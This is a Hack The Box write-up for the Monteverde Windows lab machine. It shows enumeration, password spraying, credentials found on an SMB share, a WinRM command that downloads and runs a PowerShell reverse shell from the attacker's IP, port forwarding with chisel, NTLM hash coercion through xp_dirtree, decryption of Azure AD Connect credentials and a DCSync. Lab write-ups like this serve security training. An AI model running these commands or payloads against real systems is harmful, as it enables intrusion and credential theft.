# Monteverde - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Monteverde was a pleasant, medium-rated HTB Windows machine created by [egre55](https://app.hackthebox.com/users/1190)

The user can be obtained by abusing weak password and SMB share exposing further credentials.  
Privilege escalation involved decrypting `Azure AD Connect` credentials.

## Initial recon

```console
opcode@parrot$ nmap -v -p- --min-rate 2000 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.092s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49697/tcp open  unknown
64405/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49676,49697,64405 -oN monteverde.nmap 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.089s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-11-15 19:37:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
64405/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-11-15T19:38:01
|_  start_date: N/A
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -H ldap://10.10.10.172 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=MEGABANK,DC=LOCAL
ldapServiceName: MEGABANK.LOCAL:monteverde$@MEGABANK.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
serverName: CN=MONTEVERDE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGABANK,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=MEGABANK,DC=LOCAL
namingContexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 77929
dsServiceName: CN=NTDS Settings,CN=MONTEVERDE,CN=Servers,CN=Default-First-Site
 -Name,CN=Sites,CN=Configuration,DC=MEGABANK,DC=LOCAL
dnsHostName: MONTEVERDE.MEGABANK.LOCAL
defaultNamingContext: DC=MEGABANK,DC=LOCAL
currentTime: 20231115194304.0Z
configurationNamingContext: CN=Configuration,DC=MEGABANK,DC=LOCAL
```

We have the FQDN `MONTEVERDE.MEGABANK.LOCAL` here; we can add it to `/etc/hosts`:

```text
10.10.10.172 MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDE
```

## SMB enumeration

We can enumerate SMB shares. [NetExec](https://github.com/Pennyw0rth/NetExec) is my tool of choice these days:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@355ea6860a0b:~# echo '10.10.10.172 MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDE' >> /etc/hosts
```

Testing for null session:

```console
root@355ea6860a0b:~# nxc smb 10.10.10.172 -d MEGABANK.LOCAL -u '' -p '' --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.10.10.172    445    MONTEVERDE       [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@355ea6860a0b:~# nxc smb 10.10.10.172 -d MEGABANK.LOCAL -u 'opcode' -p '' --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\opcode: STATUS_LOGON_FAILURE
```

Guest sessions are disabled as well.  

## RPC enumeration

I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for RPC enumeration and found users and groups.  
We could also have found them with null session in `rpcclient`:

```console
opcode@parrot$ rpcclient -U "%" -c "lsaquery" 10.10.10.172
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
```

Users:

```console
opcode@parrot$ rpcclient -U "%" -c "enumdomusers" 10.10.10.172
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
```

We can use `rpcclient` to generate a list of users:

```console
opcode@parrot$ rpcclient -U "%" -c "enumdomusers" 10.10.10.172 | awk -F'[][]' '{print $2}' > users.txt
```

Now we can try roasting AS-REPs:

```console
opcode@parrot$ GetNPUsers.py MEGABANK.LOCAL/ -usersfile users.txt
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Nothing here.

## Testing for weak passwords

Transfer the users list to the container:

```console
opcode@parrot$ docker cp ~/users.txt netexec:/root/
```

We can test for instances of empty passwords or passwords that are the same as usernames:

```console
root@355ea6860a0b:~# nxc smb 10.10.10.172 -d MEGABANK.LOCAL -u users.txt -p '' --continue-on-success
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest: STATUS_ACCOUNT_DISABLED 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2: STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope: STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs: STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata: STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec: STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp: STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos: STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary: STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan: STATUS_LOGON_FAILURE 

root@355ea6860a0b:~# nxc smb 10.10.10.172 -d MEGABANK.LOCAL -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:svc-ata STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:svc-bexec STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos:dgalanos STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:roleary STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:smorgan STATUS_LOGON_FAILURE 
```

`SABatchJobs:SABatchJobs` is valid.

## Post-credential enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@355ea6860a0b:~# nxc smb 10.10.10.172 -d MEGABANK.LOCAL -u 'SABatchJobs' -p 'SABatchJobs' --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [*] Enumerated shares
SMB         10.10.10.172    445    MONTEVERDE       Share           Permissions     Remark
SMB         10.10.10.172    445    MONTEVERDE       -----           -----------     ------
SMB         10.10.10.172    445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.10.10.172    445    MONTEVERDE       azure_uploads   READ            
SMB         10.10.10.172    445    MONTEVERDE       C$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       E$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.10.10.172    445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       users$          READ            
```

`azure_uploads` and `users$` are not default shares.
I like to check a few other things:

```console
root@355ea6860a0b:~# nxc ldap 10.10.10.172 -d MEGABANK.LOCAL -u 'SABatchJobs' -p 'SABatchJobs' -M adcs
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.172    389    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
ADCS        10.10.10.172    389    MONTEVERDE       [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@355ea6860a0b:~# nxc ldap 10.10.10.172 -d MEGABANK.LOCAL -u 'SABatchJobs' -p 'SABatchJobs' -M maq
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.172    389    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
MAQ         10.10.10.172    389    MONTEVERDE       [*] Getting the MachineAccountQuota
MAQ         10.10.10.172    389    MONTEVERDE       MachineAccountQuota: 10

root@355ea6860a0b:~# nxc smb 10.10.10.172 -d MEGABANK.LOCAL -u 'SABatchJobs' -p 'SABatchJobs' -M enum_av
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
ENUM_AV     10.10.10.172    445    MONTEVERDE       Found NOTHING!
```

And some groups:

```console
root@355ea6860a0b:~# nxc ldap 10.10.10.172 -d MEGABANK.LOCAL -u 'SABatchJobs' -p 'SABatchJobs' -M group-mem -o group='Remote Management Users'
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.172    389    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
GROUP-ME... 10.10.10.172    389    MONTEVERDE       [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.10.10.172    389    MONTEVERDE       mhope

root@355ea6860a0b:~# nxc ldap 10.10.10.172 -d MEGABANK.LOCAL -u 'SABatchJobs' -p 'SABatchJobs' -M group-mem -o group='Domain Admins'
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.172    389    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
GROUP-ME... 10.10.10.172    389    MONTEVERDE       [+] Found the following members of the Domain Admins group:
GROUP-ME... 10.10.10.172    389    MONTEVERDE       Administrator

root@355ea6860a0b:~# nxc ldap 10.10.10.172 -d MEGABANK.LOCAL -u 'SABatchJobs' -p 'SABatchJobs' -M group-mem -o group='Protected Users'
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.172    389    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 

root@355ea6860a0b:~# nxc ldap 10.10.10.172 -d MEGABANK.LOCAL -u 'SABatchJobs' -p 'SABatchJobs' -M group-mem -o group='Domain Computers'
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.172    389    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
```

`mhope` is the only user who can use WinRM.

We can use [impacket](https://github.com/fortra/impacket)'s `smbclient.py` to explore the SMB share:

```console
opcode@parrot$ smbclient.py MEGABANK.LOCAL/SABatchJobs:SABatchJobs@MONTEVERDE.MEGABANK.LOCAL
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

Type help for list of commands
# use users$
# ls
drw-rw-rw-          0  Fri Jan  3 18:42:48 2020 .
drw-rw-rw-          0  Fri Jan  3 18:42:48 2020 ..
drw-rw-rw-          0  Fri Jan  3 18:45:23 2020 dgalanos
drw-rw-rw-          0  Fri Jan  3 19:11:18 2020 mhope
drw-rw-rw-          0  Fri Jan  3 18:44:56 2020 roleary
drw-rw-rw-          0  Fri Jan  3 18:44:28 2020 smorgan
```

All directories other than `mhope` are empty:

```console
# cd mhope
# ls
drw-rw-rw-          0  Fri Jan  3 19:11:18 2020 .
drw-rw-rw-          0  Fri Jan  3 19:11:18 2020 ..
-rw-rw-rw-       1212  Fri Jan  3 20:29:24 2020 azure.xml
# get azure.xml
```

The `azure_uploads` share is empty.  
`azure.xml` contains a password:

```console
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
```

We can spray it across all users:

```console
root@355ea6860a0b:~# nxc smb 10.10.10.172 -d MEGABANK.LOCAL -u users.txt -p '4n0therD4y@n0th3r$' --continue-on-success
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
```

I checked the SMB shares for any new permissions as `mhope`, but it was the same as `SABatchJobs`  
`mhope` belongs to `Remote Management Users` group; therefore, we can use `WinRM`:

```console
root@355ea6860a0b:~# nxc winrm 10.10.10.172 -d MEGABANK.LOCAL -u 'mhope' -p '4n0therD4y@n0th3r$' -X 'IEX(IWR http://10.10.14.20:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.20 9001'
```

## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

The group `Azure Admins` is new, but the long SID indicates that it is not a default group.  
Maybe some DACL misconfiguration would show up in `Bloodhound`

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       3564
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2896
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       472
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1096
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1580
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49673          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       2852
  TCP    0.0.0.0:49679          0.0.0.0:0              LISTENING       612
  TCP    0.0.0.0:49697          0.0.0.0:0              LISTENING       2940
  TCP    0.0.0.0:64405          0.0.0.0:0              LISTENING       2956
  TCP    10.10.10.172:53        0.0.0.0:0              LISTENING       2940
  TCP    10.10.10.172:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2940
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING       3564
```

The MSSQL port 1433 is new. We can use [chisel](https://github.com/jpillora/chisel) to forward the port.  
On my VM:

```console
opcode@parrot$ ./chisel server -p 9999 --reverse -v
```

On the box:

```console
PS C:\windows\tasks> iwr 10.10.14.20:8000/chisel.exe -o chisel.exe
PS C:\Windows\Tasks> .\chisel.exe client 10.10.14.20:9999 R:1433:127.0.0.1:1433
```

We can use [impacket](https://github.com/fortra/impacket)'s `mssqlclient.py` to interact with MSSQL:

```console
mssqlclient.py MEGABANK.LOCAL/mhope:'4n0therD4y@n0th3r$'@127.0.0.1 -windows-auth
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MONTEVERDE): Line 1: Changed database context to 'master'.
[*] INFO(MONTEVERDE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL (MEGABANK\mhope  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   
tempdb                   0   
model                    0   
msdb                     1   
ADSync                   0   

SQL (MEGABANK\mhope  guest@master)> enum_owner
Database   Owner                    
--------   ----------------------   
master     sa                       
tempdb     sa                       
model      sa                       
msdb       sa                       
ADSync     MEGABANK\Administrator   

SQL (MEGABANK\mhope  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor   
----------   --------   ---------------   ----------   -------   -------   
```

I tried running dangerous commands, but they failed.

I also tried coercion via `xp_dirtree` in MSSQL to steal NetNTLMv2 hash.  
I started [Responder.py](https://github.com/lgandx/Responder) in a separate terminal:

```console
opcode@parrot$ sudo ./Responder.py -I tun0 -Pv
```

And back in MSSQL, I used `xp_dirtree`:

```console
SQL (MEGABANK\mhope  guest@master)> xp_dirtree \\10.10.14.20\opcode
subdirectory   depth   file   
------------   -----   ----   

```

We get a challenge, but I don't think it can be cracked:

```text
[SMB] NTLMv2-SSP Client   : 10.10.10.172
[SMB] NTLMv2-SSP Username : MEGABANK\MONTEVERDE$
[SMB] NTLMv2-SSP Hash     : MONTEVERDE$::MEGABANK:05841b5a6b3c80b6:9989D49E9AAEDC9D760A81A3F8442B32:010100000000000000093E20B318DA01427C9A5D84666F610000000002000800330052005A00300001001E00570049004E002D004600410033005000540039004A004C0052005000330004003400570049004E002D004600410033005000540039004A004C005200500033002E00330052005A0030002E004C004F00430041004C0003001400330052005A0030002E004C004F00430041004C0005001400330052005A0030002E004C004F00430041004C000700080000093E20B318DA01060004000200000008003000300000000000000000000000003000008A35E16C654E104DE3AA9871E3926F0CCC17F8392FEB0AF3C054563062B5ED390A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330032000000000000000000
```

I also looked inside the `ADSync` database:

```console
SQL (MEGABANK\mhope  guest@master)> USE ADSync

SQL (MEGABANK\mhope  MEGABANK\mhope@ADSync)> SELECT name FROM ADSync..sysobjects WHERE xtype = 'U'
name                        
-------------------------   
mms_metaverse               
mms_metaverse_lineageguid   
mms_metaverse_lineagedate   
mms_connectorspace          
mms_cs_object_log           
mms_cs_link                 
mms_management_agent        
mms_synchronization_rule    
mms_csmv_link               
mms_metaverse_multivalue    
mms_mv_link                 
mms_partition               
mms_watermark_history       
mms_run_history             
mms_run_profile             
mms_server_configuration    
mms_step_history            
mms_step_object_details     
```

The tables are populated, but I need to learn how to utilize them.

I patched AMSI and ran [adPEAS](https://github.com/61106960/adPEAS) as well as [PrivescCheck](https://github.com/itm4n/PrivescCheck).  
I also collected data for Bloodhound. But nothing remarkable was found.

## Decrypting `Azure AD Connect` credentials

The next step must somehow relate to the `Azure Admins` group.  
After taking a peek at the write-up, I learnt that we can find and decrypt credentials stored by `Azure AD Connect`  
The article [Azure AD Connect Database Exploit](https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/) by [VbScrub](https://twitter.com/VbScrub)  
I'd use his tool [AdSyncDecrypt](https://github.com/VbScrub/AdSyncDecrypt), but the article is worth reading, and the code is self-explanatory.

```console
PS C:\windows\tasks> iwr 10.10.14.20:8000/AdDecrypt.exe -o AdDecrypt.exe 
PS C:\windows\tasks> iwr 10.10.14.20:8000/mcrypt.dll -o mcrypt.dll 
PS C:\windows\tasks> cd 'C:\Program Files\Microsoft Azure AD Sync\Bin\'        
PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Windows\Tasks\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
```

As usual, we can use the credentials with `secretsdump.py` to perform DCsync:

```console
opcode@parrot$ secretsdump.py MEGABANK.LOCAL/Administrator:'d0m@in4dminyeah!'@MONTEVERDE.MEGABANK.LOCAL -just-dc
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
